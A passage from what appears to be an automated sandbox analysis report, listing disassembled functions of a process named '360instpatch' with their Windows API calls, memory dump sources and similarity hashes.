                                                                                                                                                                                                                • Part of subcall function 00B82158: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00B821BD
                                                                                                                                                                                                                • Part of subcall function 00B82158: _memset.LIBCMT ref: 00B821DF
                                                                                                                                                                                                                • Part of subcall function 00B82158: DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00B82236
                                                                                                                                                                                                                • Part of subcall function 00B82158: _memset.LIBCMT ref: 00B8226C
                                                                                                                                                                                                                • Part of subcall function 00B83BFD: __EH_prolog3_catch.LIBCMT ref: 00B83C04
                                                                                                                                                                                                                • Part of subcall function 00B83BFD: CoCreateInstance.OLE32(00BDC868,00000000,00000001,00BDC798,?,00000038,00B84568,?,?,?,?,?,0000001C,00B7EAD1,?,?), ref: 00B83C22
                                                                                                                                                                                                                • Part of subcall function 00B83BFD: SysFreeString.OLEAUT32(?), ref: 00B83C71
                                                                                                                                                                                                                • Part of subcall function 00B83BFD: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00B83C88
                                                                                                                                                                                                                • Part of subcall function 00B83BFD: SysFreeString.OLEAUT32(?), ref: 00B83D26
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$CreateFreeString_memset$BlanketControlDeviceDriveFileH_prolog3_catchInstanceProxyType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3646017727-0
                                                                                                                                                                                                              • Opcode ID: d0408ee5c21575fd6cd24069c5a71cb9d9559e9e643634f7b673a7744d0fbf09
                                                                                                                                                                                                              • Instruction ID: 6eb282ce1456f940d9516cf194dfb8fa8e8c6aff63be6a05757fdd46ed1ccdc2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0408ee5c21575fd6cd24069c5a71cb9d9559e9e643634f7b673a7744d0fbf09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B321A972D0011E9BDF12EF94C9818FEBBF9EF54350B1440AAE911B7261EB349E45DBA0
                                                                                                                                                                                                              Function 00B3EAD4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,?), ref: 00B3EB65
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                                                              • Opcode ID: 23be179f4eac75855073058a8a24e76f02b6119f745c363ed92e2e557af09f94
                                                                                                                                                                                                              • Instruction ID: ef6dcc611d0fb55b9a5789298012f8cb6f5736f4c8864a93e6a79bf08882d3fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23be179f4eac75855073058a8a24e76f02b6119f745c363ed92e2e557af09f94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46215771500709AFDF36CF15C9C4A9ABBE5EF48310F20495BF967936E0E231E9948B91
                                                                                                                                                                                                              Function 6BF325D6 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF32243: _memset.LIBCMT ref: 6BF32280
                                                                                                                                                                                                                • Part of subcall function 6BF32243: _strcat.LIBCMT ref: 6BF3228A
                                                                                                                                                                                                                • Part of subcall function 6BF32243: __wcstoi64.LIBCMT ref: 6BF322AE
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • htonl.WS2_32(?), ref: 6BF32617
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wcstoi64_malloc_memset_strcathtonl
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2862793191-0
                                                                                                                                                                                                              • Opcode ID: b39932a0cb563a551617da8486bb74bd5fe36d02693fffc44d2580fd909f4b91
                                                                                                                                                                                                              • Instruction ID: 954df38e72d02eac2c2c60690321ee1b9064780b33106d5d2eb1e191c6a5d3be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b39932a0cb563a551617da8486bb74bd5fe36d02693fffc44d2580fd909f4b91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6011A333115A32BFE7609FB8EC01F9A77949F09B54F204119EA08DB5B0DABA994087D5
                                                                                                                                                                                                              Function 6CD7AE0A Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD7AE11
                                                                                                                                                                                                                • Part of subcall function 6CDDDF34: _malloc.LIBCMT ref: 6CDDDF4E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2346879263-0
                                                                                                                                                                                                              • Opcode ID: 7858957e854a9da20a599736bcc8dbb3b575c2e48917fea486174bd3a47320c7
                                                                                                                                                                                                              • Instruction ID: 38bb6a0982a1337b8c1b7f1e3d4cbab7d57811ee460b64af69265e654e73add5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7858957e854a9da20a599736bcc8dbb3b575c2e48917fea486174bd3a47320c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F221B071F0B384DAEF18CBB895143AE7AF05F11309F21449DD549D7BA1CB758A088776
                                                                                                                                                                                                              Function 6BF326DA Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: b2d13459f75d93a76cd220f6494b47156bf53593af11ca51bdf4b0d50d632825
                                                                                                                                                                                                              • Instruction ID: e12ffde7c7b8311f1abfd70351dae69a87da56e828371f9c6a8b676d2a5b6c90
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2d13459f75d93a76cd220f6494b47156bf53593af11ca51bdf4b0d50d632825
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F11A23250012EABEF15CF64CC41EEE7BB9BB15304F0041EAE509A7250DB3A9A54CFE0
                                                                                                                                                                                                              Function 00B5EB31 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B5EB38
                                                                                                                                                                                                                • Part of subcall function 00B95546: _malloc.LIBCMT ref: 00B95560
                                                                                                                                                                                                                • Part of subcall function 00B5E1E2: __EH_prolog3.LIBCMT ref: 00B5E1E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1683881009-0
                                                                                                                                                                                                              • Opcode ID: 2e2b63148b32a772494c4e578a43280191fbc5ef54b8dfee7dddb7f00e6283b1
                                                                                                                                                                                                              • Instruction ID: 5bd357167d6a66bb431593d53dee8ed605d8b40565f90aece3140cc9a4ffb9a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2b63148b32a772494c4e578a43280191fbc5ef54b8dfee7dddb7f00e6283b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1218E30601208AFDF159FA8C585BADBBF1AF48302F1440D8FD66AB391CBB18E44DB51
                                                                                                                                                                                                              Function 00B1E410 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B1E080: GetCurrentProcessId.KERNEL32 ref: 00B1E084
                                                                                                                                                                                                                • Part of subcall function 00B1E080: CreateFileW.KERNEL32 ref: 00B1E0AA
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,64A97E63,?,00000000,?,?,00000000,00BCD2E0,000000FF,?,00B1B43F,?), ref: 00B1E465
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateCurrentExistsPathProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3040742104-0
                                                                                                                                                                                                              • Opcode ID: 62ac2c4fd45ba163acf7fb284256d5acf86ae0878e173cec8565097002caade5
                                                                                                                                                                                                              • Instruction ID: 96932e5484038cbbbbb248f52c0bfd20bd03976b8e33b9be766abbfe6dc33458
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62ac2c4fd45ba163acf7fb284256d5acf86ae0878e173cec8565097002caade5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11C272A04608ABEB10CF55E801BEEB7E8FB05760F4445AAFC2593780DB75E940CAA1
                                                                                                                                                                                                              Function 6BF330D6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: 57a343d62a45e4de71a301594b3ef367e9fd167867c68347ed9a38d62336b94a
                                                                                                                                                                                                              • Instruction ID: 424ca31ec4ba26725175d77c055ec4558c210cfc41ea9cdcfd9dc8f563985a1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57a343d62a45e4de71a301594b3ef367e9fd167867c68347ed9a38d62336b94a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B11C273D005199EEB30DBA8CC40EEFB7BCBB49714F00012AE519D7290EB78A549DB91
                                                                                                                                                                                                              Function 00B5EBDA Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B5EBE1
                                                                                                                                                                                                                • Part of subcall function 00B5DE99: __EH_prolog3.LIBCMT ref: 00B5DEA0
                                                                                                                                                                                                                • Part of subcall function 00B5EB31: __EH_prolog3.LIBCMT ref: 00B5EB38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 431132790-0
                                                                                                                                                                                                              • Opcode ID: ce738e0c6ba0bcfbae7a0bee604e0130effbe9f104f237b91801a0503506a619
                                                                                                                                                                                                              • Instruction ID: 8e6ff28d96ab9a2ca7e615513963076e8a451d548da34bd7708a8af8ebc7c28e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce738e0c6ba0bcfbae7a0bee604e0130effbe9f104f237b91801a0503506a619
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A011F832801109AFDF06EF94DD42EEEBBB6EF14301F1045A4F911B61A1DB319A29DB50
                                                                                                                                                                                                              Function 00B662CA Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B662D1
                                                                                                                                                                                                                • Part of subcall function 00B36986: _wcschr.LIBCMT ref: 00B369AB
                                                                                                                                                                                                                • Part of subcall function 00B65F4D: __EH_prolog3_GS.LIBCMT ref: 00B65F54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3H_prolog3__wcschr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4028972141-0
                                                                                                                                                                                                              • Opcode ID: 17a0522ffe620be766665a1085adb64d47a6b8cefc297c7ca97a9971ed0ace39
                                                                                                                                                                                                              • Instruction ID: 7e3400763c84fd8c78b92ad122fa2081ecd9aa53991ce292d27667902fe84817
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17a0522ffe620be766665a1085adb64d47a6b8cefc297c7ca97a9971ed0ace39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1019631284718B6DB04AA58CC52FBD37D4BB2A711F1081B2B9429E3C1CFB44A41D79A
                                                                                                                                                                                                              Function 00B34BB9 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00B34BC2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                                                                                              • Opcode ID: e169c8a4bfb5b5ffc9881e1d3534b2be287b29a60e47317e67d47e4904b6a676
                                                                                                                                                                                                              • Instruction ID: dfe38e37fef8953172e191b130af2367b6b60c024404e2eb0d4358bbe2a20e6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e169c8a4bfb5b5ffc9881e1d3534b2be287b29a60e47317e67d47e4904b6a676
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7711E571500705DFD7219B29C845BD6B3E8EB08356F2048A9E19A87092E7B4F988CF90
                                                                                                                                                                                                              Function 6BEFB071 Relevance: 1.6, APIs: 1, Instructions: 50networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 6BEFB074
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: gethostbyname
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 930432418-0
                                                                                                                                                                                                              • Opcode ID: 3b84a5abd47c707d1c72ffa9782e3791c192e7caa7e6ca0bb40f5aba89016d43
                                                                                                                                                                                                              • Instruction ID: 527d7240b255903d5902d2c90cbb9cd3acfb8edc7e51e89491331f14ab1fb526
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b84a5abd47c707d1c72ffa9782e3791c192e7caa7e6ca0bb40f5aba89016d43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE01A276A04515EFD7009F78EC80B0AB379FF8572CF2041A5E126CB261E77AD9A6C781
                                                                                                                                                                                                              Function 6BF2E39F Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF3074A: WSASetLastError.WS2_32(0000276D,?,?,?,?,?,?,?), ref: 6BF30772
                                                                                                                                                                                                              • closesocket.WS2_32 ref: 6BF2E411
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
